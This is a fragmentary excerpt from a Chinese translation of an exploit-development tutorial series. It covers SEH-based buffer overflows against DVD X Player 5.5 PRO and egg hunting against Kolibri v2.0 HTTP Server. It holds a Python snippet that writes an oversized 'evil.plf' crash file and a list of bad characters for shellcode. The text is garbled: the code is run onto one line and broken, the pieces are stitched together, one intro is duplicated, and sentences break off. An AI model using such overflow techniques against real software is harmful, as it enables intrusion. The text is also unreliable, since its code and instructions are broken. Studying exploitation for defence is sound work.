#!/usr/bin/python -w filename=evil.plf buffer = A*2000 textfile = open(filename, 'w') textfile.write(buffer) textfile.close() 创建 plf 文件, 用 immunit 结构化异常处理 (SEH) 译者 :Netfairy 前言这一节介绍漏洞利用中你会遇到的真正障碍. SEH 用于缓解缓冲区攻击造成的问题. 但它也是有缺陷的. 先说明本文不会讨论 SafeSeh 或者 SEHOP, 稍后的 Part 3b 会解决这些保护机制. 我将用 DVD X Player 5.5 PRO 演示 SEH 利用. 已有的漏洞利用程序 : 这里通常情况下漏洞利用之前我们需要先分析程序的坏字符,

寻蛋技术 译者 :Netfairy 前言 欢迎来到漏洞利用开发系列教程第四部分. 这部分讲解一项很酷的技术 : 寻蛋. 这部分我将 用 Kolibri v2.0 HTTP Server 演示这项技术. 这里有写好的漏洞利用程序 : 这里 坏字符 : \x00\x0d\x0a\x3d\x20\x3f

寻蛋技术译者 :Netfairy 前言欢迎来到漏洞利用开发系列教程第四部分. 这部分讲解一项很酷的技术 : 寻蛋. 这部分我将用 Kolibri v2.0 HTTP Server 演示这项技术. 这里有写好的漏洞利用程序 : 这里坏字符 : \x00\x0d\x0a\x3d\x20\x3f